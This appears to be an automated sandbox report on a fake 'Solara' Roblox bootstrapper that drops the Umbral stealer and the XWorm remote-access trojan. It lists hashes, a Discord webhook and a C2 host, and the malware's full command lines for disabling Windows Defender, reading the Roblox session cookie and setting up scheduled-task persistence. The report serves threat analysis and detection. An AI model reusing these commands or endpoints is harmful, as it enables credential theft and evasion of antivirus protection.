Analysis
-
max time kernel
132s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
02/03/2025, 01:30
Static task
static1
Behavioral task
behavioral1
Sample
BootstrapperNew.exe
Resource
win7-20241010-en
General
-
Target
BootstrapperNew.exe
-
Size
3.2MB
-
MD5
5d7608bf288d15a463991dd64a4a6833
-
SHA1
568225dbe01f06297daedce0f7a161bc20c3f121
-
SHA256
257f3886ec3712e93b4358a75a0bbedd236bae9d4f0ecb899664dd751de78f1b
-
SHA512
af3c3b12066eedfdf7302ad1632d475c29cc74a7627584773e556a2ad7779102ae0f431192fb6404a7d191a7a38eda9e46d3d406f569de066a4d5a426f7218fb
-
SSDEEP
98304:f0HJOQVG56a9CyT3hpbMhtYy/z+SSoYzYnix:wA2s6aUyT3hWr+FoUYn
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1345563600563081236/GZtFNjEkLtJVtAzkn2iuPtsNvHDVfN9T4KKvHQkKe2uwIcUso69vFJFK67xNihrhEyDY
Extracted
xworm
127.0.0.1:34930
minimum-ball.gl.at.ply.gg:34930
-
Install_directory
%AppData%
-
install_file
SolaraX.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0030000000019326-11.dat family_umbral behavioral1/memory/2828-13-0x00000000012D0000-0x0000000001310000-memory.dmp family_umbral -
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x0007000000019470-22.dat family_xworm behavioral1/memory/2808-26-0x00000000012F0000-0x0000000001308000-memory.dmp family_xworm behavioral1/memory/2660-116-0x00000000009B0000-0x00000000009C8000-memory.dmp family_xworm behavioral1/memory/1900-119-0x0000000001130000-0x0000000001148000-memory.dmp family_xworm -
Umbral family
-
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2852 powershell.exe 1892 powershell.exe 1680 powershell.exe 1588 powershell.exe 3048 powershell.exe 1648 powershell.exe 2568 powershell.exe 608 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Solara.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SolaraX.lnk SolaraX.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SolaraX.lnk SolaraX.exe -
Executes dropped EXE 7 IoCs
pid Process 2156 BootstrapperNe.exe 2828 Solara.exe 2948 SolaraNew.exe 2808 SolaraX.exe 1192 Process not Found 2660 SolaraX.exe 1900 SolaraX.exe -
Loads dropped DLL 1 IoCs
pid Process 2156 BootstrapperNe.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\SolaraX = "C:\\Users\\Admin\\AppData\\Roaming\\SolaraX.exe" SolaraX.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2136 wmic.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1424 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2852 powershell.exe 1892 powershell.exe 1680 powershell.exe 2568 powershell.exe 1588 powershell.exe 3048 powershell.exe 608 powershell.exe 2416 powershell.exe 2808 SolaraX.exe 1648 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2808 SolaraX.exe Token: SeDebugPrivilege 2828 Solara.exe Token: SeDebugPrivilege 2852 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 1588 powershell.exe Token: SeDebugPrivilege 3048 powershell.exe Token: SeDebugPrivilege 608 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeDebugPrivilege 2808 SolaraX.exe Token: SeIncreaseQuotaPrivilege 1456 wmic.exe Token: SeSecurityPrivilege 1456 wmic.exe Token: SeTakeOwnershipPrivilege 1456 wmic.exe Token: SeLoadDriverPrivilege 1456 wmic.exe Token: SeSystemProfilePrivilege 1456 wmic.exe Token: SeSystemtimePrivilege 1456 wmic.exe Token: SeProfSingleProcessPrivilege 1456 wmic.exe Token: SeIncBasePriorityPrivilege 1456 wmic.exe Token: SeCreatePagefilePrivilege 1456 wmic.exe Token: SeBackupPrivilege 1456 wmic.exe Token: SeRestorePrivilege 1456 wmic.exe Token: SeShutdownPrivilege 1456 wmic.exe Token: SeDebugPrivilege 1456 wmic.exe Token: SeSystemEnvironmentPrivilege 1456 wmic.exe Token: SeRemoteShutdownPrivilege 1456 wmic.exe Token: SeUndockPrivilege 1456 wmic.exe Token: SeManageVolumePrivilege 1456 wmic.exe Token: 33 1456 wmic.exe Token: 34 1456 wmic.exe Token: 35 1456 wmic.exe Token: SeIncreaseQuotaPrivilege 1456 wmic.exe Token: SeSecurityPrivilege 1456 wmic.exe Token: SeTakeOwnershipPrivilege 1456 wmic.exe Token: SeLoadDriverPrivilege 1456 wmic.exe Token: SeSystemProfilePrivilege 1456 wmic.exe Token: SeSystemtimePrivilege 1456 wmic.exe Token: SeProfSingleProcessPrivilege 1456 wmic.exe Token: SeIncBasePriorityPrivilege 1456 wmic.exe Token: SeCreatePagefilePrivilege 1456 wmic.exe Token: SeBackupPrivilege 1456 wmic.exe Token: SeRestorePrivilege 1456 wmic.exe Token: SeShutdownPrivilege 1456 wmic.exe Token: SeDebugPrivilege 1456 wmic.exe Token: SeSystemEnvironmentPrivilege 1456 wmic.exe Token: SeRemoteShutdownPrivilege 1456 wmic.exe Token: SeUndockPrivilege 1456 wmic.exe Token: SeManageVolumePrivilege 1456 wmic.exe Token: 33 1456 wmic.exe Token: 34 1456 wmic.exe Token: 35 1456 wmic.exe Token: SeIncreaseQuotaPrivilege 2608 wmic.exe Token: SeSecurityPrivilege 2608 wmic.exe Token: SeTakeOwnershipPrivilege 2608 wmic.exe Token: SeLoadDriverPrivilege 2608 wmic.exe Token: SeSystemProfilePrivilege 2608 wmic.exe Token: SeSystemtimePrivilege 2608 wmic.exe Token: SeProfSingleProcessPrivilege 2608 wmic.exe Token: SeIncBasePriorityPrivilege 2608 wmic.exe Token: SeCreatePagefilePrivilege 2608 wmic.exe Token: SeBackupPrivilege 2608 wmic.exe Token: SeRestorePrivilege 2608 wmic.exe Token: SeShutdownPrivilege 2608 wmic.exe Token: SeDebugPrivilege 2608 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2808 SolaraX.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 2600 wrote to memory of 2156 2600 BootstrapperNew.exe 29 PID 2600 wrote to memory of 2156 2600 BootstrapperNew.exe 29 PID 2600 wrote to memory of 2156 2600 BootstrapperNew.exe 29 PID 2156 wrote to memory of 2828 2156 BootstrapperNe.exe 30 PID 2156 wrote to memory of 2828 2156 BootstrapperNe.exe 30 PID 2156 wrote to memory of 2828 2156 BootstrapperNe.exe 30 PID 2156 wrote to memory of 2948 2156 BootstrapperNe.exe 31 PID 2156 wrote to memory of 2948 2156 BootstrapperNe.exe 31 PID 2156 wrote to memory of 2948 2156 BootstrapperNe.exe 31 PID 2156 wrote to memory of 2808 2156 BootstrapperNe.exe 32 PID 2156 wrote to memory of 2808 2156 BootstrapperNe.exe 32 PID 2156 wrote to memory of 2808 2156 BootstrapperNe.exe 32 PID 2808 wrote to memory of 2852 2808 SolaraX.exe 33 PID 2808 wrote to memory of 2852 2808 SolaraX.exe 33 PID 2808 wrote to memory of 2852 2808 SolaraX.exe 33 PID 2828 wrote to memory of 1892 2828 Solara.exe 35 PID 2828 wrote to memory of 1892 2828 Solara.exe 35 PID 2828 wrote to memory of 1892 2828 Solara.exe 35 PID 2828 wrote to memory of 2568 2828 Solara.exe 37 PID 2828 wrote to memory of 2568 2828 Solara.exe 37 PID 2828 wrote to memory of 2568 2828 Solara.exe 37 PID 2808 wrote to memory of 1680 2808 SolaraX.exe 39 PID 2808 wrote to memory of 1680 2808 SolaraX.exe 39 PID 2808 wrote to memory of 1680 2808 SolaraX.exe 39 PID 2808 wrote to memory of 1588 2808 SolaraX.exe 41 PID 2808 wrote to memory of 1588 2808 SolaraX.exe 41 PID 2808 wrote to memory of 1588 2808 SolaraX.exe 41 PID 2808 wrote to memory of 3048 2808 SolaraX.exe 43 PID 2808 wrote to memory of 3048 2808 SolaraX.exe 43 PID 2808 wrote to memory of 3048 2808 SolaraX.exe 43 PID 2828 wrote to memory of 608 2828 Solara.exe 45 PID 2828 wrote to memory of 608 2828 Solara.exe 45 PID 2828 wrote to memory of 608 2828 Solara.exe 45 PID 2828 wrote to memory of 2416 2828 Solara.exe 47 PID 2828 wrote to memory of 2416 2828 Solara.exe 47 PID 2828 wrote to memory of 2416 2828 Solara.exe 47 PID 2808 wrote to memory of 1424 2808 SolaraX.exe 49 PID 2808 wrote to memory of 1424 2808 SolaraX.exe 49 PID 2808 wrote to memory of 1424 2808 SolaraX.exe 49 PID 2828 wrote to memory of 1456 2828 Solara.exe 51 PID 2828 wrote to memory of 1456 2828 Solara.exe 51 PID 2828 wrote to memory of 1456 2828 Solara.exe 51 PID 2828 wrote to memory of 2608 2828 Solara.exe 54 PID 2828 wrote to memory of 2608 2828 Solara.exe 54 PID 2828 wrote to memory of 2608 2828 Solara.exe 54 PID 2828 wrote to memory of 3056 2828 Solara.exe 56 PID 2828 wrote to memory of 3056 2828 Solara.exe 56 PID 2828 wrote to memory of 3056 2828 Solara.exe 56 PID 2828 wrote to memory of 1648 2828 Solara.exe 58 PID 2828 wrote to memory of 1648 2828 Solara.exe 58 PID 2828 wrote to memory of 1648 2828 Solara.exe 58 PID 2828 wrote to memory of 2136 2828 Solara.exe 60 PID 2828 wrote to memory of 2136 2828 Solara.exe 60 PID 2828 wrote to memory of 2136 2828 Solara.exe 60 PID 1332 wrote to memory of 2660 1332 taskeng.exe 63 PID 1332 wrote to memory of 2660 1332 taskeng.exe 63 PID 1332 wrote to memory of 2660 1332 taskeng.exe 63 PID 1332 wrote to memory of 1900 1332 taskeng.exe 64 PID 1332 wrote to memory of 1900 1332 taskeng.exe 64 PID 1332 wrote to memory of 1900 1332 taskeng.exe 64 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Users\Admin\AppData\Local\Temp\BootstrapperNe.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperNe.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\Solara.exe"C:\Users\Admin\AppData\Local\Temp\Solara.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1648
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:2136
-
-
-
C:\Users\Admin\AppData\Local\Temp\SolaraNew.exe"C:\Users\Admin\AppData\Local\Temp\SolaraNew.exe"3⤵
- Executes dropped EXE
PID:2948
-
-
C:\Users\Admin\AppData\Local\Temp\SolaraX.exe"C:\Users\Admin\AppData\Local\Temp\SolaraX.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SolaraX.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SolaraX.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\SolaraX.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SolaraX.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SolaraX" /tr "C:\Users\Admin\AppData\Roaming\SolaraX.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1424
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {151BD2DB-334C-4572-A622-D2ED40AA873D} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Users\Admin\AppData\Roaming\SolaraX.exeC:\Users\Admin\AppData\Roaming\SolaraX.exe2⤵
- Executes dropped EXE
PID:2660
-
-
C:\Users\Admin\AppData\Roaming\SolaraX.exeC:\Users\Admin\AppData\Roaming\SolaraX.exe2⤵
- Executes dropped EXE
PID:1900
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.2MB
MD5d88ee0d360d34eedfbc293290a73616a
SHA142e76126180ad0837cf5df031e1716081b091000
SHA2566ade19e337fb670efee7a84e1ef68501c4dfcbfd10f57f8332539fbe1447ffb0
SHA5121b4d40c733d65e7f42935a838a4922dc89ffd9bb35d4ccce8dce9b0825742a54e12f81bf84f698c4cf02b5b51d5f4f2e78922afc7949ebce8c481ab559c479c3
-
Filesize
227KB
MD558e07162ded5e3a8a3ed89e3386d6d7d
SHA157bd70b8bc62e1715e4d67ebf7fd67c3d795712d
SHA256acb94b9228a393f88637b7296b08ebc7c73b9d47162de6be7a15cdfa3d59a929
SHA5120abfda8019dc37095db7f35ff4cdeb3256a0b469e8283fb16d2238e1454030435ef5ef4f5615bfb2243765eab0e21c33fc173ff01cb49ef6ff5b503146eeb137
-
Filesize
74KB
MD5aef41983064b12d1e648100e8141bf19
SHA1b258d4a810e818e9c9dcaba62f75f34036b60fcd
SHA256834bcea2665dc99b4c16fe87095f3e2b44e2e013ec1017407a061a1203c2f3cf
SHA5122e4e3fdf7cd1892b73cf1989dfd82d91c677653a4501f44bb2d74b153b72982e069998b5bef097a7645970838c13ac86ec546173f6baf3afb7cbc26e6c9d5524
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f9b2fe6b65445658485271aeb3916342
SHA1a082645cf454611e58eeee30a56d23ded53a050f
SHA256d72d9b46670e4730c0830f7607cdd2e195e709ff1d882b8bd4d266191ff1f3bc
SHA5126caa292a990242f82d01b75bd326a7d1c804c1c76b2cbd22ccf2b41364432f7a563c2913cf14561c713ced62b0322cbeaf9a43fc264ec3a0c94eddc9f0c82719
-
Filesize
2.9MB
MD5f227cdfd423b3cc03bb69c49babf4da3
SHA13db5a97d9b0f2545e7ba97026af6c28512200441
SHA256cb5d6c1ca0aa6232a2d55e14b20ac4a9945a0bd063c57d60a5ed3ae94160e3e8
SHA512b10afd03b02a928545c16fad39a6ae46b68b1e1a2477a6990803ce80008e7161fb2ebc9380ba15a1b074bb436aa34bcd6c94a922933d438b1c22489717e1e10e